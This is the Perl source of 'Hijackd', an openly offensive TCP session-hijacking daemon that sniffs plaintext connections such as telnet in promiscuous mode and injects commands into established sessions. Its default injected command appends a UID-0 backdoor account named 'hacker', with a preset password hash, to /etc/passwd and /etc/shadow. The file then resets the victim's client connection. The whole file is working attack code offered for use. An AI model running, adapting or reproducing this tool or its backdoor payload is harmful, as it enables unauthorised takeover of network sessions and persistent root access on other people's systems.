#!/usr/bin/perl
#
# Hijackd - Automatic Hijacking Daemon for plain protocols
# Version 0.3
#
# Programmed by Bastian Ballmann [ bytebeater@crazydj.de ]
# http://www.crazydj.de
#
# Last Update: 22.12.2002

# Are you r00t?
if($> != 0)
{
    die "You must be root!\n";
}


###[ Loading modules ]###

use path::hijack;    # Hijacking Stuff
use path::config;    # Configuration Stuff
use Getopt::Std;     # Parsing parameter
use Net::PcapUtils;  # Packet capturing


###[ MAIN PART ]###

# Need help?
if($ARGV[0] eq "--help")
{
    die "Usage: $0 -h [host(s)] -p [port(s)] -c <connection> -i <device> -S <infiltrade-string>\n\n";
}

# Globale Variablen
my $connection;

# Starte die GUI version
if($ARGV[0] eq "--gui")
{
    require "hijackd-gui.pl";
}
else
{
# Parsing parameter
getopts('h:c:p:i:S:',\%args);
&start(%args);
}



###[ Subroutines ]###

# Start the hijackd
sub start
{
# Achtung a bissel Werbung
about();

# Create config object
$cfg = config->new();

if($cfg->check(%args) == 1)
{
    exit(1);
}

# Wurde kein String zum infiltrieren angegeben?
if($args{'S'} eq "")
{
    # Dann versuche den User hacker mit Passwort hacker anzulegen
    $args{'S'} = "echo 'hacker:x:0:0::/:/bin/sh' >> /etc/passwd && echo 'hacker:\$1\$u70t2mzi\$v8VeFsr3uFwbl772vjb/a0:12019:0:99999:7:::' >> /etc/shadow\n";
}

# Wurde kein Port angegeben?
# Dann wird per default 23 verwendet
if($args{p} eq "")
{
    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"You have not specified a port.\nI will use 23 per default...\n");
	$result->see(end);
	$top->update;
    }
    else
    {
	print "You have not specified a port.\nI will use 23 per default...\n";
    }

    $cfg->set_port(23);
}

# Man bastelt sich ne pcap expression
$pcap = $cfg->pcap();

if($pcap ne "")
{
    $pcap .= "and tcp";
}
else
{
    $pcap = "tcp";
}

if($ARGV[0] eq "--gui")
{
    $result->insert(end,"Start sniffin $pcap on " . $cfg->get_device . "\n\n");
    $result->see(end);
    $top->update();
}
else
{
    print "Start sniffin $pcap on " . $cfg->get_device . "\n\n";
}

# Start sniffin
Net::PcapUtils::loop(\&check,
		     PROMISC => 1,
		     FILTER => $pcap,
		     DEV => $cfg->get_device);
}



# Check if the connection should be hijacked
sub check
{
    my($arg,$header,$packet) = @_;
    my $flag = 0;

# GUI updaten?
    $top->update() if $ARGV[0] eq "--gui";

# Existiert schon ein connection objekt?
    unless(defined $connection)
    {
	$connection = hijack->new($packet);
	return;
    }

# Wurde die Connection schon gehijackt?
# Dann lass sie in Ruhe...
    if($connection->hijacked($packet)) { return; }

# Gehoert das Paket zu "unserer" Verbindung?
    unless($connection->check($packet)) { return; }

# Hat der TCP Handshake schon statt gefunden?
    if($connection->is_established)
    {	
	if($cfg->multiport)
	{
	    # Interessiert uns der Source Port?
	    for(@{$cfg->get_ports})
	    {
		hijack($packet,$_)
	    }
	}
	else
	{
	    hijack($packet,$cfg->get_port);
	}
    }
}


# Hijacke die Verbindung
sub hijack
{
    my $packet = shift;
    my $port = shift;

    # Kommt das Paket vom Server?
    if($connection->check_port($packet,$port,0))
    {
	# Dem Modul bekannt geben, dass dieses Paket vom Server kommt
	$connection->stateful($packet,"server");
	
	# Kann die Verbindung gehijackt werden?
	if($connection->is_hijackable)
	{
	    # Na dann los!
	    $connection->infiltrate($args{'S'});
	    $connection->is_hijacked($packet);	    

	    my $output = "Hijacked " . $connection->{client_ip} . ":" . $connection->{client_port} . " --> " . $connection->{server_ip} . ":" . $connection->{server_port} . "  SEQ: " . $connection->{server_ack} . " Command: $args{'S'}\n";

	    if($ARGV[0] eq "--gui")
	    {
		$result->insert(end,"$output");
		$result->see(end);
		$top->update();
	    }
	    else
	    {
		print $output;
	    }

	    # Reset client connection to avoid ack storms
	    $connection->reset('rst','client');
	}
    }

    # Das Packet kommt vom Client
    elsif($connection->check_port($packet,0,$port))
    {
	$connection->stateful($packet,"client");
    }
}


# About this tool
sub about
{
    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"Hijackd -- Automatic hijacking daemon for plain protocols\n");
	$result->insert(end,"Version 0.3\n");
	$result->insert(end,"Programmed by Bastian Ballmann [ bytebeater\@crazydj.de ]\n\n");
	$result->see(end);
	$top->update();
    }
    else
    {
	print "Hijackd -- Automatic hijacking daemon for plain protocols\n";
	print "Version 0.3\n";
	print "Programmed by Bastian Ballmann [ bytebeater\@crazydj.de ]\n\n";
    }
}
